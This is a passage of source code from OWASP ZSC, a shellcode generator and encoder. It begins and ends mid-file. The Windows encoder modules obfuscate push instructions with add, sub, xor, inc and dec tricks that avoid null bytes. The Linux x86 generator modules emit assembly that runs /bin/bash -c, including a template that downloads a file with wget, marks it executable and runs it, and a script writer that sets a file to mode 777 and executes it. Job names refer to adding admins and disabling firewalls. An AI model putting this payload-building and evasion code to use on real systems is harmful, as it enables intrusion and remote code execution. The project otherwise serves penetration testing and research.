%%ecx\nadd %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 39 | str(ebx_1), str(ebx_2)) 40 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 41 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nneg %%ecx\nadd %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 42 | str(ebx_1), str(ebx_2)) 43 | shellcode = shellcode.replace(line, command) 44 | t = False 45 | return shellcode 46 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/add_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(type, shellcode, job): 18 | value = str(type.rsplit('add_')[1][2:]) 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | t = True 24 | while t: 25 | ebx_1 = value 26 | ebx_2 = "%x" % (int(data, 16) - int(value, 16)) 27 | if str('00') not in str(value) and str('00') not in str( 28 | ebx_2) and len(ebx_2.replace('-', '')) >= 7 and len( 29 | value) >= 7 and '-' not in value: 30 | ebx_2 = ebx_2.replace('-', '') 31 | if job == 'exec': 32 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nadd %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 33 | str(value), str(ebx_2)) 34 | elif job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 35 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nadd %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 36 | str(value), str(ebx_2)) 37 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 38 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nadd %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 39 | str(value), str(ebx_2)) 40 | shellcode = shellcode.replace(line, command) 41 | t = False 42 | return shellcode 43 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/dec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(shellcode, job): 18 | 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | ecx_2 = "%x" % (int(data, 16) + int('0x01', 16)) 24 | command = '\npush $0x%s\npop %%ecx\ndec %%ecx\npush %%ecx\n' % (str(ecx_2)) 25 | shellcode = shellcode.replace(line, command) 26 | return shellcode 27 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/dec_timesyouwant.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(decvalue, shellcode, job): 18 | times = int(decvalue.rsplit('dec_')[1]) 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | ecx_2 = "%x" % (int(data, 16) + times) 24 | dec = 'dec %ecx\n' * times 25 | command = '\npush $0x%s\npop %%ecx\n%s\npush %%ecx\n' % (str(ecx_2), dec) 26 | shellcode = shellcode.replace(line, command) 27 | return shellcode 28 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/inc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(shellcode, job): 18 | 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | ecx_2 = "%x" % (int(data, 16) - int('0x01', 16)) 24 | command = '\npush $0x%s\npop %%ecx\ninc %%ecx\npush %%ecx\n' % (str(ecx_2)) 25 | shellcode = shellcode.replace(line, command) 26 | return shellcode 27 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/inc_timesyouwant.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(incvalue, shellcode, job): 18 | times = int(incvalue.rsplit('inc_')[1]) 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | ecx_2 = "%x" % (int(data, 16) - times) 24 | inc = 'inc %ecx\n' * times 25 | command = '\npush $0x%s\npop %%ecx\n%s\npush %%ecx\n' % (str(ecx_2), inc) 26 | shellcode = shellcode.replace(line, command) 27 | return shellcode 28 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/sub_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(shellcode, job): 18 | for line in shellcode.rsplit('\n'): 19 | if 'push' in line and '$0x' in line and ',' not in line and len( 20 | line) > 14: 21 | data = line.rsplit('push')[1].rsplit('$0x')[1] 22 | t = True 23 | while t: 24 | if _version is 2: 25 | ebx_1 = binascii.b2a_hex(''.join( 26 | random.choice(chars) for i in range(4))) 27 | if _version is 3: 28 | ebx_1 = (binascii.b2a_hex((''.join( 29 | random.choice(chars) for i in range(4))).encode( 30 | 'latin-1'))).decode('latin-1') 31 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 32 | if str('00') not in str(ebx_1) and str('00') not in str( 33 | ebx_2) and len(ebx_2) >= 7 and len( 34 | ebx_1) >= 7 and '-' not in ebx_1: 35 | ebx_2 = ebx_2.replace('-', '') 36 | if job == 'exec' or job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 37 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nsub %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 38 | str(ebx_1), str(ebx_2)) 39 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 40 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nsub %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 41 | str(ebx_1), str(ebx_2)) 42 | shellcode = shellcode.replace(line, command) 43 | t = False 44 | return shellcode 45 | 46 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/sub_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(type, shellcode, job): 18 | value = str(type.rsplit('sub_')[1][2:]) 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | t = True 24 | while t: 25 | ebx_1 = value 26 | ebx_2 = "%x" % (int(data, 16) + int(value, 16)) 27 | if str('00') not in str(value) and str('00') not in str( 28 | ebx_2) and len(ebx_2.replace('-', '')) >= 7 and len( 29 | value) >= 7 and '-' not in value: 30 | ebx_2 = ebx_2.replace('-', '') 31 | if job == 'exec': 32 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nsub %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 33 | str(value), str(ebx_2)) 34 | elif job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 35 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nsub %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 36 | str(value), str(ebx_2)) 37 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 38 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nsub %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 39 | str(value), str(ebx_2)) 40 | shellcode = shellcode.replace(line, command) 41 | t = False 42 | return shellcode 43 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/xor_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(shellcode, job): 18 | 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | t = True 24 | while t: 25 | if _version is 2: 26 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 27 | for i in range(4))) 28 | if _version is 3: 29 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 30 | chars) for i in range(4))).encode('latin-1')) 31 | ).decode('latin-1') 32 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 33 | if str('00') not in str(ebx_1) and str('00') not in str( 34 | ebx_2) and len(ebx_2.replace('-', '')) > 7 and len( 35 | ebx_1) > 7 and '-' not in ebx_1: 36 | ebx_2 = ebx_2.replace('-', '') 37 | if job == 'exec': 38 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nxor %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 39 | str(ebx_1), str(ebx_2)) 40 | elif job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 41 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nxor %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 42 | str(ebx_1), str(ebx_2)) 43 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 44 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nxor %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 45 | str(ebx_1), str(ebx_2)) 46 | shellcode = shellcode.replace(line, command) 47 | t = False 48 | return shellcode 49 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/xor_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(type, shellcode, job): 18 | value = str(type.rsplit('xor_')[1][2:]) 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | t = True 24 | while t: 25 | ebx_1 = value 26 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 27 | if str('00') not in str(ebx_1) and str('00') not in str( 28 | ebx_2) and len(ebx_2.replace('-', '')) >= 7 and len( 29 | ebx_1) >= 7 and '-' not in ebx_1: 30 | ebx_2 = ebx_2.replace('-', '') 31 | if job == 'exec': 32 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nxor %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 33 | str(ebx_1), str(ebx_2)) 34 | elif job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 35 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nxor %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 36 | str(ebx_1), str(ebx_2)) 37 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 38 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nxor %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 39 | str(ebx_1), str(ebx_2)) 40 | shellcode = shellcode.replace(line, command) 41 | t = False 42 | return shellcode 43 | -------------------------------------------------------------------------------- /lib/generator/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC | ZCR Shellcoder 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/Ali-Razmjoo/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/chmod.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from lib.opcoder.linux_x86 import convert 11 | 12 | 13 | def chmod(perm_num, file_add): 14 | return '''push $0x0f 15 | pop %%eax 16 | %s 17 | %s 18 | mov %%esp,%%ebx 19 | int $0x80 20 | mov $0x01,%%al 21 | mov $0x01,%%bl 22 | int $0x80''' % (perm_num, file_add) 23 | 24 | 25 | def run(data): 26 | file_to_perm, perm_num = data[0], data[1] 27 | return chmod( 28 | stack.generate(perm_num, '%ecx', 'int'), 29 | stack.generate(file_to_perm, '%ebx', 'string')) 30 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/dir_create.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | dirname = data[0] 45 | command = 'mkdir %s' % (str(dirname)) 46 | return sys(stack.generate( 47 | command.replace('[space]', ' '), '%ecx', 'string')) 48 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/download.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | url, filename = data[0], data[1] 45 | command = 'wget %s -O %s' % (str(url), str(filename)) 46 | return sys(stack.generate( 47 | command.replace('[space]', ' '), '%ecx', 'string')) 48 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/download_execute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | url, filename, command = data[0], data[1], data[2] 45 | command = 'wget %s -O %s ; chmod +x %s ; %s' % ( 46 | str(url), str(filename), str(filename), str(command)) 47 | return sys(stack.generate( 48 | command.replace('[space]', ' '), '%ecx', 'string')) 49 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from lib.opcoder.linux_x86 import convert 11 | 12 | 13 | def exc(file_to_exec): 14 | return ''' 15 | mov $0x46,%%al 16 | xor %%ebx,%%ebx 17 | xor %%ecx,%%ecx 18 | int $0x80 19 | %s 20 | mov %%esp,%%ebx 21 | xor %%eax,%%eax 22 | mov $0xb,%%al 23 | int $0x80 24 | mov $0x1,%%al 25 | mov $0x1,%%bl 26 | int $0x80 27 | ''' % (file_to_exec) 28 | 29 | 30 | def run(data): 31 | file_to_exec = data[0] 32 | return exc(stack.generate(file_to_exec, '%ebx', 'string')) 33 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/file_create.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | import binascii 12 | from core import stack 13 | from lib.opcoder.linux_x86 import convert 14 | 15 | 16 | def sys(command): 17 | return '''push $0xb 18 | pop %%eax 19 | cltd 20 | push %%edx 21 | %s 22 | mov %%esp,%%esi 23 | push %%edx 24 | push $0x632d9090 25 | pop %%ecx 26 | shr $0x10,%%ecx 27 | push %%ecx 28 | mov %%esp,%%ecx 29 | push %%edx 30 | push $0x68 31 | push $0x7361622f 32 | push $0x6e69622f 33 | mov %%esp,%%ebx 34 | push %%edx 35 | push %%edi 36 | push %%esi 37 | push %%ecx 38 | push %%ebx 39 | mov %%esp,%%ecx 40 | int $0x80 41 | ''' % (str(command)) 42 | 43 | 44 | def run(data): 45 | filename, content = data[0], data[1] 46 | content = binascii.b2a_hex(content.replace('[space]', ' ')) 47 | l = len(content) - 1 48 | n = 0 49 | c = '\\x' 50 | for word in content: 51 | c += word 52 | n += 1 53 | if n is 2: 54 | n = 0 55 | c += '\\x' 56 | c = c[:-2] 57 | command = 'echo -e "%s" > %s' % (str(c), str(filename)) 58 | return sys(stack.generate( 59 | command.replace('[space]', ' '), '%ecx', 'string')) 60 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/script_executor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | import sys 12 | import binascii 13 | from core import color 14 | from core import stack 15 | from lib.opcoder.linux_x86 import convert 16 | 17 | 18 | def sys_(command): 19 | return '''push $0xb 20 | pop %%eax 21 | cltd 22 | push %%edx 23 | %s 24 | mov %%esp,%%esi 25 | push %%edx 26 | push $0x632d9090 27 | pop %%ecx 28 | shr $0x10,%%ecx 29 | push %%ecx 30 | mov %%esp,%%ecx 31 | push %%edx 32 | push $0x68 33 | push $0x7361622f 34 | push $0x6e69622f 35 | mov %%esp,%%ebx 36 | push %%edx 37 | push %%edi 38 | push %%esi 39 | push %%ecx 40 | push %%ebx 41 | mov %%esp,%%ecx 42 | int $0x80 43 | ''' % (str(command)) 44 | 45 | 46 | def run(data): 47 | filename, content, command = data[0], data[1], data[2] 48 | command = command.replace('[space]', ' ') 49 | try: 50 | cont = binascii.b2a_hex(open(content).read()) 51 | except: 52 | from core import start 53 | sys.exit(color.color('red') + 'Error, Cannot find/open the file %s' % ( 54 | content) + color.color('reset')) 55 | l = len(cont) - 1 56 | n = 0 57 | c = '\\x' 58 | for word in cont: 59 | c += word 60 | n += 1 61 | if n is 2: 62 | n = 0 63 | c += '\\x' 64 | c = c[:-2] 65 | command = 'echo -e "%s" > %s ; chmod 777 %s ; %s' % ( 66 | str(c), str(filename), str(filename), str(command)) 67 | return sys(stack.generate( 68 | command.replace('[space]', ' '), '%ecx', 'string')) 69 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/system.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | command = data[0] 45 | command = command.replace('[space]', ' ') 46 | if int(len(command)) < 5: 47 | command = str( 48 | command) + '[space]&&[space]echo[space]1[space]>[space]/dev/null' #bypass a bug in here, fix later 49 | #bug in line 12 & 13, check later 50 | return sys(stack.generate( 51 | command.replace('[space]', ' '), '%ecx', 'string')) 52 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/write.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | from core import stack 11 | from lib.opcoder.linux_x86 import convert 12 | 13 | 14 | def write(null, file_name, content, length): 15 | return ''' 16 | push $0x5 17 | pop %%eax 18 | %s 19 | %s 20 | mov %%esp,%%ebx 21 | push $0x4014141 22 | pop %%ecx 23 | shr $0x10,%%ecx 24 | int $0x80 25 | mov %%eax,%%ebx 26 | push $0x4 27 | pop %%eax 28 | %s 29 | mov %%esp,%%ecx 30 | %s 31 | int $0x80 32 | mov $0x1,%%al 33 | mov $0x1,%%bl 34 | int $0x80 35 | ''' % (str(null), str(file_name), str(content), str(length)) 36 | 37 | 38 | def run(data): 39 | path_file, content = data[0], data[1] 40 | null = len(path_file) % 4 41 | if null is not 0: 42 | null = '' 43 | if null is 0: 44 | null = 'xor %ebx,%ebx\npush %ebx\n' 45 | return write( 46 | str(null), stack.generate( 47 | str(path_file), '%ebx', 'string'), stack.generate( 48 | str(content), '%ecx', 'string'), stack.generate( 49 | str(len(content)), '%edx', 'int')) 50 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/chmod.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def chmod(file, perm_num): 13 | return ''' 14 | xor %%eax,%%eax 15 | push %%eax 16 | %s 17 | mov 